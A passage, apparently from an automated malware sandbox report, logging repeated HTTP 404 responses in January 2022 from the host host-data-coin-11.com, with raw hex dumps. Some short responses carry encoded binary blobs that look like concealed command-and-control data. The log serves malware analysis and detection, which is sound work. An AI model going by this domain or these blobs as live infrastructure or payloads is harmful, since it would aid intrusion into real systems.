6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:43:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
